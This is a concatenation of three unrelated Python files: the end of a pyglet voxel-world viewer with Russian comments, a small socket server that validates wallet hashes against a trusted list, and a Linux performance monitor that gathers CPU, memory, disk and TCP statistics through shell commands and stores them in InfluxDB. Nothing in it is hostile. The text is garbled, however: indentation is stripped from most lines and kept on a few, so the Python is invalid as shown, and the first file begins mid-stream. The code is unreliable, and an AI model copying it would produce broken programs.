gluPerspective(70.0, width / height, 0.1, 100.0)
set_light()
def draw_focused_unit(point):
""" Подсвечивает рамкой блок, на который направлен взгляд(курсор),
только если наблюдатель не находится внутри существующего ("твердого") блока.
:param point: tuple
:return: void
"""
x, y, z = camera.myPos
if (round(x), round(y), round(z)) not in rig.active_units:
glDisable(GL_LIGHTING)
pyglet.gl.glColor4f(0.9, 0.9, 1.0, 0.1)
pyglet.graphics.draw(24, GL_QUADS, ('v3f/static', tricks.get_frame_vertices(point)))
glEnable(GL_LIGHTING)
def draw_2d_content():
az = str('%.3f' % round(camera.azim, 3))
ze = str('%.3f' % round(camera.zenit, 3))
to = str(camera.look_to())
text = "azim: %s, zenit: %s, look to: %s" % (az, ze, to)
set_2d()
label = pyglet.text.Label(text, font_name='DejaVu Sans Mono',
font_size=10, color=(45, 45, 245, 255), x=20, y=window.height - 18,
anchor_x='left', anchor_y='top')
info_quad(window.height, 370, 36)
show_sight(int(window.width/2), int(window.height/2))
label.draw()
def app_init():
pyglet.font.add_file("pics%sttf%sDejaVuSansMono.ttf" % (sep, sep))
pyglet.font.load('DejaVu Sans Mono')
glPolygonMode(GL_FRONT, GL_FILL)
glEnable(GL_BLEND) # включить поддержку прозрачности
    # Manages the batch of 3D space elements
rig.space_batch = pyglet.graphics.Batch()
def calc_remove(units_removing, points_checking):
""" Обновление состава активных элементов отображения трехмерного пространства:
- элементы/блоки,расстояние до которых от наблюдателя больше границы видимости - удаляются,
(- при сдвиге границы видимости новые видимые блоки должны добавляться)
:units_removing: list
:points_checking: list
:return: void
"""
far_max = 50.0
"""
while True:
if points_checking:
# сamera.location()
x1, y1, z1 = points_checking.pop(-1)
while points_checking:
x2, y2, z2 = points_checking.pop()
# контролируем дистанцию только по горизотали
distance = sqrt((x2-x1)**2 +(z2-z1)**2)
if distance > far_max:
units_removing.append((x2, y2, z2))
"""
if __name__ == '__main__':
window = window_open()
camera = Camera()
# import time
# start_run = time.time()
# print("init time: %f" % (time.time() - start_run))
app_init()
world = space.World()
units_init = deepcopy(rig.active_units)
setup_light()
set_fog()
    # Dynamic updates to the active space elements
from multiprocessing import Manager
units_removing = Manager().list()
points_checking = Manager().list()
p = Process(target=calc_remove, args=(units_removing, points_checking))
p.start()
    # the current fps value can be read via fps.clock.get_fps()
fps = clock.ClockDisplay(format='%(fps).2f', color=(1.0, 1.0, 1.0, 0.8))
@window.event
def on_key_press(symbol, modifiers):
key_pressed_point = camera.location()
if symbol == key.ESCAPE:
window.set_exclusive_mouse(False)
else:
camera.key_press(symbol, modifiers)
        # If there is no active removal queue, add a new one
#if not units_removing:
# points_checking.extend(rig.active_units.keys())
# points_checking.append(key_pressed_point)
@window.event
def on_draw():
gluLookAt(*camera.LookSet)
set_3d()
world.draw()
p = camera.look_to()
if p:
draw_focused_unit(p)
draw_2d_content()
fps.draw()
        # If there are elements still waiting to be loaded
if units_init:
l = min(len(units_init), 500)
for x in range(l):
p, texture_id = units_init.popitem()
if type(texture_id) == int:
rig.active_units[p] = space.Unit(p, texture_id)
"""
        # If there are elements that have moved beyond the view limit, they
        # should be removed from rendering
        if units_removing:
            # To avoid stalling camera movement, remove them in chunks of 50
            # elements per screen redraw
l = min(len(units_removing), 50)
for x in range(l):
p = units_removing.pop()
u = rig.active_units.pop(p)
u.delete()
"""
@window.event
def on_mouse_motion(x, y, dx, dy):
camera.turn_look(x, y, dx, dy)
@window.event
def on_mouse_press(x, y, button, modifiers):
look_to = camera.look_to()
if look_to and button == pyglet.window.mouse.RIGHT:
e = rig.active_units.pop(look_to)
e.delete()
@window.event
def on_key_release(symbol, modifiers):
camera.key_release(symbol, modifiers)
pyglet.clock.schedule(camera.stream)
pyglet.app.run()
p.terminate()
p.join()
|
tpls_server.py
|
# server.py
import datetime as dt
import logging
import sys
# Note: logging.basicConfig only takes effect on the first call, so configure it once.
logging.basicConfig(level=logging.DEBUG,
                    format='%(name)s: %(message)s',
                    )
local_ip = "192.168.1.5"
n_port = 1234
tw = ['22670bf1b10545e46f7d797c8e4bd7a77af1bb667f7e864aaca07fad65439f84','951c49bc88ce9a2cc31d4470423590a7c0bedbef953a06a72e6b5d4f74731ed6', '56b8ba882b6aeeb7fa43f9125d8d2909b8a734f82b46b67b3809105a28cfb05d']
trusted_wallet_hash = tw
handshake = []
run = True
def chash_0(input_string):
    """Validate an incoming wallet hash against the trusted list."""
    handshake.clear()
    autolog('chash_0: input')
    packet = input_string
    if packet in tw:
        cs = 'CONNECTION SUCCESSFUL'
        handshake.append(1)
    else:
        cs = 'ERROR: CONNECTION UNSUCCESSFUL'
        handshake.append(0)
    autolog(cs)
    autolog(handshake)
    return cs
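# Illustrative behaviour (not part of the original server), assuming the
# membership check above:
#   chash_0(tw[0])      -> 'CONNECTION SUCCESSFUL'          and handshake == [1]
#   chash_0('deadbeef') -> 'ERROR: CONNECTION UNSUCCESSFUL' and handshake == [0]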
def client_thread(conn, ip, port, MAX_BUFFER_SIZE = 4096):
# incoming user wallet hash, id of user/node
init_chash_b = conn.recv(MAX_BUFFER_SIZE)
autolog('client_thread: ')
# MAX_BUFFER_SIZE is how big the message can be
import sys
siz = sys.getsizeof(init_chash_b)
if siz >= MAX_BUFFER_SIZE:
print("The length of input is probably too long: {}".format(siz))
autolog('client_thread: ')
# decode incoming user hash
chash_0_r = init_chash_b.decode("utf8")
autolog(chash_0_r)
# analyze incoming user hash
res = chash_0(chash_0_r)
autolog('chash -> analyer')
vysl = res.encode("utf8") # encode the result string
conn.sendall(vysl) # send it to client
if handshake[0] == 1:
# fid tx
autolog('FID INCOMING')
data_bytes = conn.recv(MAX_BUFFER_SIZE)
        siz = sys.getsizeof(data_bytes)
if siz >= MAX_BUFFER_SIZE:
print("The length of input is probably too long: {}".format(siz))
# decode the FID
data = data_bytes.decode('utf-8')
autolog(data)
fid_analyze(data)
        # response after fid executes
replyb = 'DATA TRANSFER COMPLETE'
conn.sendall(replyb.encode('utf-8'))
else:
conn.close() # close connection
arnold = 'CONNECTION ' + ip + ':' + port + " TERMINATED"
autolog(arnold)
start_handshake()
def fid_analyze(fid):
    global run  # without this declaration the assignment below would only create a local variable
    autolog(type(fid))
    if fid == '99':
        autolog(fid)
        run = False
elif fid == '0':
# pipe to execute function
autolog('0_NETWORK_PROTOCOL')
elif fid == '1':
autolog('1_np')
elif fid == 'msg':
incoming_msg(fid)
else:
        autolog('NO MATCHING FID EXECUTABLES')
def post_fid_anal():
pass
def incoming_msg(msg):
autolog(msg)
def start_handshake():
import socket
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# this is for easy starting/killing the app
soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
autolog('SOCKET CREATED')
try:
soc.bind((local_ip, n_port))
autolog('SOCKET BIND COMPLETE')
except socket.error as msg:
import sys
print(dt.datetime.now(), 'BIND_FAIL_ERROR: ' + str(sys.exc_info()))
sys.exit()
#Start listening on socket
soc.listen(10)
autolog('SOCKET LISTENING')
# for handling task in separate jobs we need threading
from threading import Thread
    # accept a single incoming connection; after each client the server
    # re-binds via start_handshake() rather than looping over accept()
conn, addr = soc.accept()
ip, port = str(addr[0]), str(addr[1])
d = 'loop_0 > ACCEPTING CONNECTIONS FROM ' + ip + ':' + port
autolog(d)
try:
Thread(target=client_thread, args=(conn, ip, port)).start()
except:
print(dt.datetime.now(), "Terible error!")
import traceback
autolog('loop: ERROR')
traceback.print_exc()
soc.close()
def autolog(message):
import inspect, logging
# Get the previous frame in the stack, otherwise it would
# be this function!!!
func = inspect.currentframe().f_back.f_code
# Dump the message + the name of this function to the log.
logging.debug("{}\t{}\t{}\t{}".format(
dt.datetime.now(),
func.co_filename,
func.co_name,
message
))
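# Illustrative client sketch (not part of the original server): the handshake
# expected by client_thread() above - send a trusted wallet hash, read the
# verdict, then send one FID string. Host/port come from the module defaults;
# the function is defined for reference only and is never called.
def example_client(wallet_hash, fid='msg'):
    import socket
    soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    soc.connect((local_ip, n_port))
    soc.sendall(wallet_hash.encode('utf8'))     # step 1: identify ourselves
    verdict = soc.recv(4096).decode('utf8')     # 'CONNECTION SUCCESSFUL' or an error
    if verdict == 'CONNECTION SUCCESSFUL':
        soc.sendall(fid.encode('utf8'))         # step 2: send a function id
        print(soc.recv(4096).decode('utf8'))    # expected: 'DATA TRANSFER COMPLETE'
    soc.close()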
|
performance_monitor.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: leeyoshinari
import os
import re
import time
import json
import queue
import traceback
import threading
from concurrent.futures import ThreadPoolExecutor
import requests
import influxdb
from logger import logger, cfg, handle_exception
class PerMon(object):
def __init__(self):
self.IP = cfg.getServer('host')
self.thread_pool = cfg.getServer('threadPool') if cfg.getServer('threadPool') >= 0 else 0
self._msg = {'port': [], 'pid': [], 'isRun': [], 'startTime': [], 'stopTime': []} # 端口号、进程号、监控状态、开始监控时间
self.is_system = cfg.getMonitor('isMonSystem') # 是否监控服务器的资源
self.error_times = cfg.getMonitor('errorTimes') # 执行命令失败次数
self.sleepTime = cfg.getMonitor('sleepTime')
self.maxCPU = cfg.getMonitor('maxCPU')
self.CPUDuration = cfg.getMonitor('CPUDuration') / cfg.getMonitor('system_interval')
self.isCPUAlert = cfg.getMonitor('isCPUAlert')
self.minMem = cfg.getMonitor('minMem')
self.isMemAlert = cfg.getMonitor('isMemAlert')
self.frequencyFGC = cfg.getMonitor('frequencyFGC')
self.isJvmAlert = cfg.getMonitor('isJvmAlert')
self.echo = cfg.getMonitor('echo')
self.isTCP = cfg.getMonitor('isTCP')
system_interval = cfg.getMonitor('system_interval') # 每次执行监控命令的时间间隔
port_interval = cfg.getMonitor('port_interval') # 每次执行监控命令的时间间隔
self.system_interval = max(system_interval, 1) # 设置的值如果小于1,则默认为1
self.port_interval = max(port_interval, 1)
self.system_interval = self.system_interval - 1.06 # 0.06为程序运行、写库时间
self.system_interval = max(self.system_interval, 0)
self.port_interval = self.port_interval - 0.195 # 0.195为程序运行、写库时间
self.system_version = '' # 系统版本
self.cpu_info = ''
self.cpu_cores = 0 # CPU核数
self.total_mem = 0 # 总内存,单位G
self.total_mem_100 = 0 # 总内存,单位100*G,主要用于求内存占比,减少运算量
self.nic = '' # 系统正在使用的网卡
self.all_disk = [] # 磁盘号
self.total_disk = 1 # 磁盘总大小,单位M
self.total_disk_h = 0 # 磁盘总大小,以人可读的方式展示,单位T或G
self.network_speed = 1 # 服务器网卡带宽
self.get_system_version()
self.get_cpu_cores()
self.get_total_mem()
self.get_system_nic()
self.get_disks()
self.get_system_net_speed()
self.get_total_disk_size()
self.monitor_task = queue.Queue() # 创建一个FIFO队列
self.executor = ThreadPoolExecutor(self.thread_pool + 1) # 创建线程池, +1是需要监控系统
self.client = influxdb.InfluxDBClient(cfg.getInflux('host'), cfg.getInflux('port'), cfg.getInflux('username'),
cfg.getInflux('password'), cfg.getInflux('database')) # 创建数据库连接
self.FGC = {} # 每个端口的full gc次数
self.FGC_time = {} # 每个端口每次full gc的时间
self.last_cpu_io = [] # 最近一段时间的cpu的值,约100s
self.is_java = {} # 监控的端口是否是java服务,0 or 1
self.monitor()
@property
def start(self):
return self._msg
@start.setter
def start(self, value):
if value['port']:
if value['port'] in self._msg['port']: # 如果端口已经监控过,则更新相关数据
index = self._msg['port'].index(value['port'])
self._msg['pid'][index] = value['pid']
if self._msg['isRun'][index] == 0: # 如果已经停止监控,则更新监控状态和开始监控时间
self._msg['isRun'][index] = value['is_run']
self._msg['startTime'][index] = time.strftime('%Y-%m-%d %H:%M:%S')
self._msg['stopTime'][index] = None
self.monitor_task.put((self.write_cpu_mem, index)) # 把监控的端口任务放入队列中
self.FGC[str(value['port'])] = 0 # 重置 FGC次数
self.FGC_time[str(value['port'])] = [] # 重置 FGC 时间
if self.monitor_task.qsize() > 0: # 如果队列不为空,则监控状态置为2,排队中
self._msg['isRun'][index] = 2
else:
self._msg['isRun'][index] = value['is_run']
self._msg['startTime'][index] = time.strftime('%Y-%m-%d %H:%M:%S')
self._msg['stopTime'][index] = None
else:
self.is_java_server(value['port']) # 判断端口是否是java服务
self._msg['pid'].append(value['pid']) # 如果端口未监控过,则添加该端口相关数据
self._msg['port'].append(value['port'])
self._msg['isRun'].append(value['is_run'])
self._msg['startTime'].append(time.strftime('%Y-%m-%d %H:%M:%S'))
self._msg['stopTime'].append(None)
self.monitor_task.put((self.write_cpu_mem, len(self._msg['port'])-1)) # 把监控的端口任务放入队列中
self.FGC.update({str(value['port']): 0}) # 初始化 FGC 次数
self.FGC_time.update({str(value['port']): []}) # 初始化 FGC 时间
if self.monitor_task.qsize() > 0: # 如果队列不为空,则监控状态置为2,排队中
self._msg['isRun'][-1] = 2
else:
raise Exception('参数异常')
# if len(self._msg['port']) > 0: # 如果已经开始监控端口,则同时开始监控整个系统
# self.is_system = 1
@property
def stop(self):
return self._msg
@stop.setter
def stop(self, value):
index = self._msg['port'].index(value['port'])
self._msg['isRun'][index] = value['is_run']
def worker(self):
"""
从队列中获取数据,并开始监控
:return:
"""
while True:
func, param = self.monitor_task.get()
func(param)
self.monitor_task.task_done()
def monitor(self):
"""
开始监控
:return:
"""
for i in range(self.thread_pool + 1):
self.executor.submit(self.worker) # 启动线程池监控任务
# self.monitor_task.put((self.register_and_clear_port, 1)) # 将注册和清理任务放入队列中
self.monitor_task.put((self.write_system_cpu_mem_and_register_clear, 1)) # 将监控系统的任务放入队列中
def write_cpu_mem(self, index):
"""
监控端口的CPU使用率、占用内存大小和jvm变化(Java应用)
:param index: 监控端口的下标索引
:return:
"""
self._msg['startTime'][index] = time.strftime('%Y-%m-%d %H:%M:%S') # 更新开始监控时间
jvm = 0.0 # java服务的JVM内存数据初始化,主要用于非java服务的端口
run_error = 0 # 初始化执行监控命令失败的次数
run_error_time = time.time() # 初始化执行监控命令失败的时间
port = self._msg['port'][index]
pid = self._msg['pid'][index]
is_run_jvm = self.is_java.get(str(port), 0)
line = [{'measurement': self.IP,
'tags': {'type': str(port)},
'fields': {
'cpu': 0.0,
'mem': 0.0,
'jvm': 0.0,
'tcp': 0,
'close_wait': 0,
'time_wait': 0
}}]
while True:
if self._msg['isRun'][index] > 0: # 开始监控
self._msg['isRun'][index] = 1 # 重置端口监控状态为监控中
try:
cpu, mem = self.get_cpu_mem(pid) # 获取CPU使用率和占用内存大小
if cpu is None: # 如果CPU使用率未获取到,说明监控命令执行异常
logger.warning(f'获取cpu数据异常,异常pid为{pid}')
if port: # 如果端口号存在
pid = port_to_pid(port) # 根据端口号查询进程号
if pid: # 如果进程号存在,则更新进程号
self._msg['pid'][index] = pid
self._msg['startTime'][index] = time.strftime('%Y-%m-%d %H:%M:%S')
# 如果连续30分钟执行监控命令都失败,则停止监控
if time.time() - run_error_time > 1800:
self._msg['isRun'][index] = 0
self._msg['stopTime'][index] = time.time()
logger.error(f'{port}端口连续1800s执行监控命令都失败,已停止监控')
break
time.sleep(self.sleepTime)
continue
else: # 如果没有端口号,说明监控的直接是进程号
# 如果连续执行监控命令失败的次数大于设置值,则停止监控
if run_error > self.error_times:
self._msg['isRun'][index] = 0
self._msg['stopTime'][index] = time.time()
logger.error(f'{pid}进程连续{run_error}次执行监控命令失败,已停止监控')
break
run_error += 1 # 执行命令失败次数加1
logger.error(f'当前{pid}进程执行监控命令失败次数为{run_error}.')
time.sleep(self.sleepTime)
continue
line[0]['fields']['cpu'] = cpu
line[0]['fields']['mem'] = mem
tcp_num = self.get_port_tcp(port)
line[0]['fields']['tcp'] = tcp_num.get('tcp', 0)
line[0]['fields']['close_wait'] = tcp_num.get('close_wait', 0)
line[0]['fields']['time_wait'] = tcp_num.get('time_wait', 0)
if is_run_jvm:
jvm = self.get_jvm(port, pid) # 获取JVM内存
line[0]['fields']['jvm'] = jvm
self.client.write_points(line) # 写数据到数据库
logger.info(f'cpu_and_mem: port_{port},pid_{pid},{cpu},{mem},{jvm}')
run_error_time = time.time() # 如果监控命令执行成功,则重置
run_error = 0 # 如果监控命令执行成功,则重置
except Exception:
logger.error(traceback.format_exc())
time.sleep(self.sleepTime)
time.sleep(self.port_interval)
if self._msg['isRun'][index] == 0: # 如果监控状态为0, 则停止监控
logger.info(f'{port}端口已经停止监控')
self.FGC[str(port)] = 0
self._msg['isRun'][index] = 0
self._msg['stopTime'][index] = time.time()
break
def write_system_cpu_mem_and_register_clear(self, is_system):
"""
监控系统CPU使用率、剩余内存和磁盘IO
定时任务,总共有两个,一个是向服务端注册本机,一个是清理已经停止监控的过期端口
:param is_system: 未使用
:return:
"""
cpu_flag = True # 控制CPU过高时是否邮件通知标志
mem_flag = True # 控制内存过低时是否邮件通知标志
echo = True # 控制是否清理缓存标志
line = [{'measurement': self.IP,
'tags': {'type': 'system'},
'fields': {
'cpu': 0.0,
'mem': 0.0,
'rec': 0.0,
'trans': 0.0,
'net': 0.0,
'tcp': 0,
'retrans': 0.0
}}]
for disk in self.all_disk:
# 系统磁盘号目前发现2种格式,分别是'sda'和'sda-1',因为influxdb查询时,无法识别'-',故replace。其他格式的待验证
disk_n = disk.replace('-', '')
line[0]['fields'].update({disk_n: 0.0})
line[0]['fields'].update({disk_n + '_r': 0.0})
line[0]['fields'].update({disk_n + '_w': 0.0})
disk_usage = self.get_used_disk_rate()
# 注册本机参数
url = f'http://{cfg.getMaster("host")}:{cfg.getMaster("port")}/Register'
header = {
"Accept": "application/json, text/plain, */*",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json; charset=UTF-8"}
post_data = {
'host': self.IP,
'port': cfg.getServer('port'),
'system': self.system_version,
'cpu': self.cpu_cores,
'cpu_usage': 0.0,
'nic': self.nic,
'network_speed': self.network_speed,
'mem': round(self.total_mem, 2),
'mem_usage': 0.0,
'disk_size': self.total_disk_h,
'disk_usage': disk_usage,
'disks': ','.join(self.all_disk)
}
clear_time = time.time()
start_time = time.time()
disk_start_time = time.time()
while True:
if time.time() - start_time > 5: # 每隔5秒注册本机
try:
res = requests.post(url=url, json=post_data, headers=header)
logger.info(f"客户端注册结果:{res.content.decode('unicode_escape')}")
start_time = time.time()
if time.time() - clear_time > 600: # 每隔10分钟清理一次过期的端口
logger.debug('正常清理停止监控的端口')
self.clear_port()
clear_time = time.time()
except Exception:
logger.error(traceback.format_exc())
if time.time() - disk_start_time > 300: # 每隔5分钟获取一次磁盘使用情况
disk_usage = self.get_used_disk_rate()
if disk_usage:
post_data['disk_usage'] = disk_usage # 磁盘使用率,不带%号
disk_start_time = time.time()
if self.is_system: # 开始监控
try:
res = self.get_system_cpu_io_speed() # 获取系统CPU、内存和磁盘IO、带宽
if res['disk'] and res['cpu'] is not None and res['mem'] is not None:
for k, v in res['disk'].items():
line[0]['fields'][k] = min(v, 100) # 写磁盘IO数据到数据库
for k, v in res['disk_r'].items():
line[0]['fields'][k] = v
for k, v in res['disk_w'].items():
line[0]['fields'][k] = v
line[0]['fields']['cpu'] = res['cpu']
line[0]['fields']['mem'] = res['mem']
line[0]['fields']['rec'] = res['rece']
line[0]['fields']['trans'] = res['trans']
line[0]['fields']['net'] = res['network']
line[0]['fields']['tcp'] = res['tcp']
line[0]['fields']['retrans'] = res['retrans']
self.client.write_points(line) # 写cpu和内存到数据库
logger.info(f"system: CpuAndMem,{res['cpu']},{res['mem']},{res['disk']},{res['disk_r']},{res['disk_w']},"
f"{res['rece']},{res['trans']},{res['network']}, {res['tcp']}, {res['retrans']}")
if len(self.last_cpu_io) > self.CPUDuration:
self.last_cpu_io.pop(0)
self.last_cpu_io.append(res['cpu'])
cpu_usage = sum(self.last_cpu_io) / len(self.last_cpu_io)
post_data['cpu_usage'] = cpu_usage # CPU使用率,带%号
post_data['mem_usage'] = 1 - res['mem'] / self.total_mem # 内存使用率,不带%号
if cpu_usage > self.maxCPU:
msg = f'当前CPU平均使用率大于{self.maxCPU},CPU使用率过高。'
logger.warning(msg)
if self.isCPUAlert and cpu_flag:
cpu_flag = False # 标志符置为False,防止连续不断的发送邮件
thread = threading.Thread(target=notification, args=(msg,)) # 开启线程发送邮件通知
thread.start()
if res['mem'] <= self.minMem:
msg = f"{self.IP} 当前系统剩余内存为{res['mem']}G,内存过低"
logger.warning(msg)
if self.isMemAlert and mem_flag:
mem_flag = False # 标志符置为False,防止连续不断的发送邮件
thread = threading.Thread(target=notification, args=(msg, )) # 开启线程发送邮件通知
thread.start()
if self.echo and echo:
echo = False # 标志符置为False,防止连续不断的清理缓存
thread = threading.Thread(target=self.clear_cache, args=()) # 开启线程清理缓存
thread.start()
else:
# 如果内存正常,标识符重置为True
cpu_flag = True
mem_flag = True
echo = True
time.sleep(self.system_interval)
except Exception:
logger.error(traceback.format_exc())
time.sleep(3)
else:
time.sleep(3)
@handle_exception(is_return=True, default_value=(None, None))
def get_cpu_mem(self, pid):
"""
获取进程的CPU使用率和内存使用大小
:param pid: 进程号
:return: CPU使用率(%)和内存占用大小(G)
"""
cpu = None
mem = None
# result = os.popen(f'top -n 1 -b -p {pid} |tr -s " "').readlines()
result = os.popen(f'top -n 1 -b |grep -P {pid} |tr -s " "').readlines() # 执行命令
res = [ress.strip().split(' ') for ress in result]
logger.debug(f'查询进程{pid}的CPU使用率和内存结果为:{res}')
for r in res:
if str(pid) == r[0]:
ind = r.index(str(pid))
cpu = float(r[ind + 8]) / self.cpu_cores # CPU使用率
mem = float(r[ind + 9]) * self.total_mem_100 # 内存占用大小
return (cpu, mem)
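    # Illustrative note (not part of the original module), assuming a typical
    # `top -b -n 1` row layout:
    #   PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
    # With ind pointing at the PID column, r[ind + 8] is %CPU (divided by the
    # core count above) and r[ind + 9] is %MEM (scaled by total_mem / 100 to GB).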
@handle_exception(is_return=True, default_value=0)
def get_jvm(self, port, pid):
"""
获取JVM内存
:param port: 端口号
:param pid: 进程号
:return: jvm内存大小(G)
"""
result = os.popen(f'jstat -gc {pid} |tr -s " "').readlines()[1] # 执行命令
res = result.strip().split(' ')
logger.debug(f'查询进程{pid}的JVM结果为:{res}')
mem = float(res[2]) + float(res[3]) + float(res[5]) + float(res[7]) # 计算jvm
# 已追加写的方式,将FGC次数和时间写到本地。当FGC频率过高时,发送邮件提醒
fgc = int(res[14])
if self.FGC[str(port)] < fgc: # 如果FGC次数增加
self.FGC[str(port)] = fgc
self.FGC_time[str(port)].append(time.time())
if len(self.FGC_time[str(port)]) > 2: # 计算FGC频率
frequency = self.FGC_time[str(port)][-1] - self.FGC_time[str(port)][-2]
if frequency < self.frequencyFGC: # 如果FGC频率大于设置值,则发送邮件提醒
msg = f'{self.IP}服务器上的{port}端口的Full GC频率为{frequency}.'
logger.warning(msg)
if self.isJvmAlert:
thread = threading.Thread(target=notification, args=(msg, ))
thread.start()
# 将FGC次数和时间写到日志
logger.warning(f"端口{port}第{self.FGC[str(port)]}次Full GC.")
elif self.FGC[str(port)] > fgc: # 如果FGC次数减小,说明可能重启,则重置
self.FGC[str(port)] = 0
if self.FGC[str(port)] == 0: # 如果FGC次数为0,则重置
self.FGC_time[str(port)] = []
return mem / 1024 / 1024
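    # Illustrative note (not part of the original module), assuming a JDK 8
    # style `jstat -gc` column layout:
    #   S0C S1C S0U S1U EC EU OC OU MC MU CCSC CCSU YGC YGCT FGC FGCT GCT
    # res[2]+res[3]+res[5]+res[7] above is S0U+S1U+EU+OU (used heap, KB) and
    # res[14] is the cumulative full-GC count used for the FGC alert.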
@handle_exception(is_return=True, default_value={'disk': {}, 'disk_r': {}, 'disk_w': {}, 'cpu': None, 'mem': None, 'rece': None, 'trans': None, 'network': None, 'tcp': None, 'retrans': None})
def get_system_cpu_io_speed(self):
"""
获取系统CPU使用率、剩余内存和磁盘IO、网速和网络使用率
网速的获取,必须得间隔一段时间;磁盘IO的获取也得间隔一段时间
执行磁盘IO命令一般间隔1秒,故在执行磁盘IO命令前后执行网速命令,此时正好间隔约1秒
:return: 磁盘IO,cpu使用率(%),剩余内存(G),网络上行和下行速率,单位 Mb/s
"""
disk = {}
disk_r = {}
disk_w = {}
cpu = None
bps1 = None
bps2 = None
rece = None
trans = None
network = None
if self.nic:
bps1 = os.popen(f'cat /proc/net/dev |grep {self.nic} |tr -s " "').readlines()
logger.debug(f'第一次获取网速的结果:{bps1}')
result = os.popen(f'iostat -x -m 1 2 |tr -s " "').readlines() # 执行命令
logger.debug(f'获取磁盘IO结果:{result}')
if self.nic:
bps2 = os.popen(f'cat /proc/net/dev |grep {self.nic} |tr -s " "').readlines()
logger.debug(f'第二次获取网速的结果:{bps2}')
result.pop(0)
disk_res = [l.strip() for l in result if len(l) > 5]
disk_res = disk_res[int(len(disk_res)/2)-1:]
for i in range(len(disk_res)):
if 'avg-cpu' in disk_res[i]:
cpu_res = disk_res[i+1].strip().split(' ') # CPU空闲率
if len(cpu_res) > 3:
cpu = 100 - float(cpu_res[-1]) # CPU使用率
logger.debug(f'系统CPU使用率为:{cpu}%')
continue
if 'Device' in disk_res[i]:
for j in range(i+1, len(disk_res)): # 遍历所有磁盘
disk_line = disk_res[j].strip().split(' ')
disk_num = disk_line[0].replace('-', '') # replace的原因是因为influxdb查询时,无法识别'-'
disk.update({disk_num: float(disk_line[-1])}) # 磁盘的IO
disk_r.update({disk_num + '_r': float(disk_line[5])}) # 磁盘读 Mb/s
disk_w.update({disk_num + '_w': float(disk_line[6])}) # 磁盘写 Mb/s
logger.debug(f'当前获取的磁盘数据:IO: {disk}, Read: {disk_r}, Write: {disk_w}')
break
result = os.popen('cat /proc/meminfo| grep MemFree| uniq').readlines()[0] # 执行命令,获取系统剩余内存
logger.debug(f'系统剩余内存为:{result}G')
mem = float(result.split(':')[-1].split('k')[0].strip()) / 1024 / 1024
if bps1 and bps2:
data1 = bps1[0].split(':')[1].strip().split(' ')
data2 = bps2[0].split(':')[1].strip().split(' ')
rece = (int(data2[0]) - int(data1[0])) / 1024 / 1024
trans = (int(data2[8]) - int(data1[8])) / 1024 / 1024
# 如果没有获取到网口带宽数据,默认为1Mb/s;如果是千兆网口,可直接将结果除以1000
# 800 = 8 * 100,为什么要乘以8,因为网口带宽除以8即为网口支持的最大速率
network = 800 * (rece + trans) / self.network_speed
logger.debug(f'系统网络带宽:收{rece}Mb/s,发{trans}Mb/s,带宽占比{network}%')
tcp, Retrans_ratio = self.get_tcp()
return {'disk': disk, 'disk_r': disk_r, 'disk_w': disk_w, 'cpu': cpu, 'mem': mem, 'rece': rece,
'trans': trans, 'network': network, 'tcp': tcp, 'retrans': Retrans_ratio}
'''def get_handle(pid):
"""
获取进程占用的句柄数
:param pid: 进程号
:return: 句柄数
"""
result = os.popen("lsof -n | awk '{print $2}'| sort | uniq -c | sort -nr | " + "grep {}".format(pid)).readlines()
res = result[0].strip().split(' ')
logger.debug(res)
handles = None
if str(pid) in res:
handles = int(res[0])
return handles'''
@handle_exception(is_return=True, default_value=(0, 0.0))
def get_tcp(self):
"""
获取TCP数量,计算重传率
:return:
"""
tcp = 0
Retrans_ratio = 0.0
if self.isTCP:
result = os.popen('cat /proc/net/snmp |grep Tcp |tr -s " "').readlines()
tcps = result[-1].strip().split(' ')
logger.debug(f'获取TCP数据为{tcps}')
tcp = int(tcps[9]) # 当前服务器TCP连接数
Retrans_ratio = (int(tcps[-4]) / int(tcps[-5])) * 100 # TCP重传率
return tcp, Retrans_ratio
@handle_exception(is_return=True, default_value={})
def get_port_tcp(self, port):
"""
获取端口的连接数
:param port: 端口号
:return:
"""
tcp_num = {}
res = os.popen(f'netstat -ant |grep {port} |tr -s " "').read()
tcp_num.update({'tcp': res.count('tcp')})
tcp_num.update({'established': res.count('ESTABLISHED')})
tcp_num.update({'close_wait': res.count('CLOSE_WAIT')})
tcp_num.update({'time_wait': res.count('TIME_WAIT')})
return tcp_num
def get_cpu_cores(self):
"""
获取系统CPU信息
:return:
"""
cpu_model = ''
cpu_num = 0
cpu_core = 0
try:
result = os.popen('cat /proc/cpuinfo | grep "model name" |uniq').readlines()[0]
cpu_model = result.strip().split(':')[1].strip()
logger.info(f'当前系统CPU型号为{cpu_model}')
except Exception as err:
logger.error('CPU型号未获取到')
logger.error(err)
try:
result = os.popen('cat /proc/cpuinfo | grep "physical id" | uniq | wc -l').readlines()[0]
cpu_num = int(result)
logger.info(f'当前系统CPU个数为{cpu_num}')
except Exception as err:
logger.error('CPU型号未获取到')
logger.error(err)
try:
result = os.popen('cat /proc/cpuinfo | grep "cpu cores" | uniq').readlines()[0]
cpu_core = int(result.strip().split(':')[1].strip())
logger.info(f'当前系统每个CPU的核数为{cpu_core}')
except Exception as err:
logger.error('每个CPU的核数未获取到')
logger.error(err)
result = os.popen('cat /proc/cpuinfo| grep "processor"| wc -l').readlines()[0]
self.cpu_cores = int(result)
logger.info(f'当前系统CPU核数为{self.cpu_cores}')
if cpu_model and cpu_num and cpu_core:
self.cpu_info = f'{cpu_num}个{cpu_core}核CPU,共有{self.cpu_cores}核,CPU型号为{cpu_model}'
else:
self.cpu_info = f'CPU核数为{self.cpu_cores}'
@handle_exception(is_return=True)
def get_total_mem(self):
"""
获取系统总内存
:return:
"""
result = os.popen('cat /proc/meminfo| grep "MemTotal"| uniq').readlines()[0]
self.total_mem = float(result.split(':')[-1].split('k')[0].strip()) / 1024 / 1024
self.total_mem_100 = self.total_mem / 100
logger.info(f'当前系统总内存为{self.total_mem}G')
@handle_exception(is_return=True)
def get_disks(self):
"""
获取系统所有磁盘号
:return:
"""
result = os.popen(f'iostat -x -k |tr -s " "').readlines()
disk_res = [l.strip() for l in result if len(l) > 5]
for i in range(len(disk_res)):
if 'Device' in disk_res[i]:
for j in range(i + 1, len(disk_res)):
disk_line = disk_res[j].strip().split(' ')
self.all_disk.append(disk_line[0])
